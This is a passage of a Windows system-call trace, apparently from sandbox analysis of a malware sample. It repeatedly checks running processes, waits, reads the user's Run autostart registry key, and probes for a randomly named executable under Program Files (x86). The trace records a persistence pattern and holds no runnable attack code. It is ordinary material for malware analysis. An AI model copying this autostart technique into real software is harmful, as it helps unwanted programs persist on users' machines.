| out: SystemInformation=0x4f0000, ResultLength=0x0) returned 0xc0000004 [0259.342] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4f0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0259.343] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4f0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0259.343] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4f0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4f0000, ResultLength=0x0) returned 0x0 [0259.570] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4f0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0259.571] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0259.574] NtCreateKey (in: KeyHandle=0xdea70, DesiredAccess=0x20219, ObjectAttributes=0xde1e0*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea70*=0x270) returned 0x0 [0259.579] NtEnumerateValueKey (in: KeyHandle=0x270, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde434, Length=0x200, ResultLength=0xde834 | out: KeyValueInformation=0xde434, ResultLength=0xde834) returned 0x0 [0259.579] NtClose (Handle=0x270) returned 0x0 [0259.579] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Lbxhx9hm\\1byd2dsxipq.exe", NtPathName=0xde81c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Lbxhx9hm\\1byd2dsxipq.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0259.579] NtCreateFile (in: FileHandle=0xde83c, DesiredAccess=0x120089, ObjectAttributes=0xde804*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Lbxhx9hm\\1byd2dsxipq.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde824, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde83c*=0x0, IoStatusBlock=0xde824*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0259.579] RtlFreeHeap (HeapHandle=0x6f0000, Flags=0x0, BaseAddress=0x731f08) returned 1 [0259.579] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Lbxhx9hm\\1byd2dsxipq.exe", NtPathName=0xdea38, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Lbxhx9hm\\1byd2dsxipq.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0259.579] NtCreateFile (in: FileHandle=0xdea58, DesiredAccess=0x120089, ObjectAttributes=0xdea20*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Lbxhx9hm\\1byd2dsxipq.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea40, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea58*=0x0, IoStatusBlock=0xdea40*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0259.579] RtlFreeHeap (HeapHandle=0x6f0000, Flags=0x0, BaseAddress=0x731aa8) returned 1 [0259.579] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4f0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0259.580] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4f0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4f0000, ResultLength=0x0) returned 0xc0000004 [0259.582] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4f0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0259.583] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4f0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0259.583] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4f0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4f0000, ResultLength=0x0) returned 0x0 [0259.757] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4f0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0259.758] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0259.764] NtCreateKey (in: KeyHandle=0xdea70, DesiredAccess=0x20219, ObjectAttributes=0xde1e0*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea70*=0x270) returned 0x0 [0259.778] NtEnumerateValueKey (in: KeyHandle=0x270, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde434, Length=0x200, ResultLength=0xde834 | out: KeyValueInformation=0xde434, ResultLength=0xde834) returned 0x0 [0259.778] NtClose (Handle=0x270) returned 0x0 [0259.778] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Lbxhx9hm\\1byd2dsxipq.exe", NtPathName=0xde81c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Lbxhx9hm\\1byd2dsxipq.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0259.779] NtCreateFile (in: FileHandle=0xde83c, DesiredAccess=0x120089, ObjectAttributes=0xde804*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Lbxhx9hm\\1byd2dsxipq.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde824, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde83c*=0x0, IoStatusBlock=0xde824*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0259.779] RtlFreeHeap (HeapHandle=0x6f0000, Flags=0x0, BaseAddress=0x7319c8) returned 1 [0259.779] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Lbxhx9hm\\1byd2dsxipq.exe", NtPathName=0xdea38, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Lbxhx9hm\\1byd2dsxipq.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0259.779] NtCreateFile (in: FileHandle=0xdea58, DesiredAccess=0x120089, ObjectAttributes=0xdea20*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Lbxhx9hm\\1byd2dsxipq.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea40, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea58*=0x0, IoStatusBlock=0xdea40*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0259.779] RtlFreeHeap (HeapHandle=0x6f0000, Flags=0x0, BaseAddress=0x731cd8) returned 1 [0259.779] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4f0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0259.779] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4f0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4f0000, ResultLength=0x0) returned 0xc0000004 [0259.783] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4f0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0259.783] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4f0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0259.783] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4f0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4f0000, ResultLength=0x0) returned 0x0 [0260.163] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4f0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0260.170] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0260.185] NtCreateKey (in: KeyHandle=0xdea70, DesiredAccess=0x20219, ObjectAttributes=0xde1e0*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea70*=0x270) returned 0x0 [0260.187] NtEnumerateValueKey (in: KeyHandle=0x270, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde434, Length=0x200, ResultLength=0xde834 | out: KeyValueInformation=0xde434, ResultLength=0xde834) returned 0x0 [0260.190] NtClose (Handle=0x270) returned 0x0 [0260.191] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Lbxhx9hm\\1byd2dsxipq.exe", NtPathName=0xde81c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Lbxhx9hm\\1byd2dsxipq.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0260.191] NtCreateFile (in: FileHandle=0xde83c, DesiredAccess=0x120089, ObjectAttributes=0xde804*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Lbxhx9hm\\1byd2dsxipq.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde824, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde83c*=0x0, IoStatusBlock=0xde824*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0260.192] RtlFreeHeap (HeapHandle=0x6f0000, Flags=0x0, BaseAddress=0x731cd8) returned 1 [0260.192] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Lbxhx9hm\\1byd2dsxipq.exe", NtPathName=0xdea38, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Lbxhx9hm\\1byd2dsxipq.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0260.192] NtCreateFile (in: FileHandle=0xdea58, DesiredAccess=0x120089, ObjectAttributes=0xdea20*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Lbxhx9hm\\1byd2dsxipq.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea40, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea58*=0x0, IoStatusBlock=0xdea40*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0260.192] RtlFreeHeap (HeapHandle=0x6f0000, Flags=0x0, BaseAddress=0x731b88) returned 1 [0260.192] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4f0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0260.192] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4f0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4f0000, ResultLength=0x0) returned 0xc0000004 [0260.197] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4f0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0260.197] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4f0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0260.198] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4f0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4f0000, ResultLength=0x0) returned 0x0 [0260.417] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4f0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0260.418] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0260.441] NtCreateKey (in: KeyHandle=0xdea70, DesiredAccess=0x20219, ObjectAttributes=0xde1e0*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea70*=0x270) returned 0x0 [0260.443] NtEnumerateValueKey (in: KeyHandle=0x270, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde434, Length=0x200, ResultLength=0xde834 | out: KeyValueInformation=0xde434, ResultLength=0xde834) returned 0x0 [0260.443] NtClose (Handle=0x270) returned 0x0 [0260.443] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Lbxhx9hm\\1byd2dsxipq.exe", NtPathName=0xde81c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Lbxhx9hm\\1byd2dsxipq.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0260.443] NtCreateFile (in: FileHandle=0xde83c, DesiredAccess=0x120089, ObjectAttributes=0xde804*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Lbxhx9hm\\1byd2dsxipq.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde824, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde83c*=0x0, IoStatusBlock=0xde824*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0260.446] RtlFreeHeap (HeapHandle=0x6f0000, Flags=0x0, BaseAddress=0x731f08) returned 1 [0260.446] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Lbxhx9hm\\1byd2dsxipq.exe", NtPathName=0xdea38, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Lbxhx9hm\\1byd2dsxipq.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0260.446] NtCreateFile (in: FileHandle=0xdea58, DesiredAccess=0x120089, ObjectAttributes=0xdea20*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Lbxhx9hm\\1byd2dsxipq.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea40, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea58*=0x0, IoStatusBlock=0xdea40*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0260.446] RtlFreeHeap (HeapHandle=0x6f0000, Flags=0x0, BaseAddress=0x731f78) returned 1 [0260.446] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4f0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0260.447] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4f0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4f0000, ResultLength=0x0) returned 0xc0000004 [0260.449] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4f0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0260.449] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4f0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0260.450] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4f0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4f0000, ResultLength=0x0) returned 0x0 [0260.864] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4f0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0260.865] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0260.873] NtCreateKey (in: KeyHandle=0xdea70, DesiredAccess=0x20219, ObjectAttributes=0xde1e0*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea70*=0x270) returned 0x0 [0260.874] NtEnumerateValueKey (in: KeyHandle=0x270, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde434, Length=0x200, ResultLength=0xde834 | out: KeyValueInformation=0xde434, ResultLength=0xde834) returned 0x0 [0260.874] NtClose (Handle=0x270) returned 0x0 [0260.874] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Lbxhx9hm\\1byd2dsxipq.exe", NtPathName=0xde81c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Lbxhx9hm\\1byd2dsxipq.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0260.874] NtCreateFile (in: FileHandle=0xde83c, DesiredAccess=0x120089, ObjectAttributes=0xde804*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Lbxhx9hm\\1byd2dsxipq.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde824, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde83c*=0x0, IoStatusBlock=0xde824*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0260.875] RtlFreeHeap (HeapHandle=0x6f0000, Flags=0x0, BaseAddress=0x731d48) returned 1 [0260.875] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Lbxhx9hm\\1byd2dsxipq.exe", NtPathName=0xdea38, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Lbxhx9hm\\1byd2dsxipq.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0260.875] NtCreateFile (in: FileHandle=0xdea58, DesiredAccess=0x120089, ObjectAttributes=0xdea20*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Lbxhx9hm\\1byd2dsxipq.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea40, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea58*=0x0, IoStatusBlock=0xdea40*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0260.875] RtlFreeHeap (HeapHandle=0x6f0000, Flags=0x0, BaseAddress=0x7319c8) returned 1 [0260.875] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4f0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0260.875] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4f0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4f0000, ResultLength=0x0) returned 0xc0000004 [0260.878] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4f0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0260.878] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4f0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0260.878] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4f0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4f0000, ResultLength=0x0) returned 0x0 [0261.068] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4f0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0261.069] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0261.085] NtCreateKey (in: KeyHandle=0xdea70, DesiredAccess=0x20219, ObjectAttributes=0xde1e0*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea70*=0x270) returned 0x0 [0261.087] NtEnumerateValueKey (in: KeyHandle=0x270, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde434, Length=0x200, ResultLength=0xde834 | out: KeyValueInformation=0xde434, ResultLength=0xde834) returned 0x0 [0261.087] NtClose (Handle=0x270) returned 0x0 [0261.087] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Lbxhx9hm\\1byd2dsxipq.exe", NtPathName=0xde81c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Lbxhx9hm\\1byd2dsxipq.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0261.087] NtCreateFile (in: FileHandle=0xde83c, DesiredAccess=0x120089, ObjectAttributes=0xde804*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Lbxhx9hm\\1byd2dsxipq.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde824, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde83c*=0x0, IoStatusBlock=0xde824*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0261.087] RtlFreeHeap (HeapHandle=0x6f0000, Flags=0x0, BaseAddress=0x7320c8) returned 1 [0261.087] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Lbxhx9hm\\1byd2dsxipq.exe", NtPathName=0xdea38, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Lbxhx9hm\\1byd2dsxipq.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0261.087] NtCreateFile (in: FileHandle=0xdea58, DesiredAccess=0x120089, ObjectAttributes=0xdea20*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Lbxhx9hm\\1byd2dsxipq.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea40, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea58*=0x0, IoStatusBlock=0xdea40*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0261.087] RtlFreeHeap (HeapHandle=0x6f0000, Flags=0x0, BaseAddress=0x731f08) returned 1 [0261.087] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4f0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0261.088] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4f0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4f0000, ResultLength=0x0) returned 0xc0000004 [0261.095] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4f0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0261.095] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4f0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0261.095] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4f0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4f0000, ResultLength=0x0) returned 0x0 [0261.535] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4f0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0261.536] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0261.575] NtCreateKey (in: KeyHandle=0xdea70, DesiredAccess=0x20219, ObjectAttributes=0xde1e0*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea70*=0x270) returned 0x0 [0261.577] NtEnumerateValueKey (in: KeyHandle=0x270, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde434, Length=0x200, ResultLength=0xde834 | out: KeyValueInformation=0xde434, ResultLength=0xde834) returned 0x0 [0261.577] NtClose (Handle=0x270) returned 0x0 [0261.577] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Lbxhx9hm\\1byd2dsxipq.exe", NtPathName=0xde81c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Lbxhx9hm\\1byd2dsxipq.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0261.577] NtCreateFile (in: FileHandle=0xde83c, DesiredAccess=0x120089, ObjectAttributes=0xde804*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Lbxhx9hm\\1byd2dsxipq.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde824, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde83c*=0x0, IoStatusBlock=0xde824*(Status=0x0, Pointer=0x0, 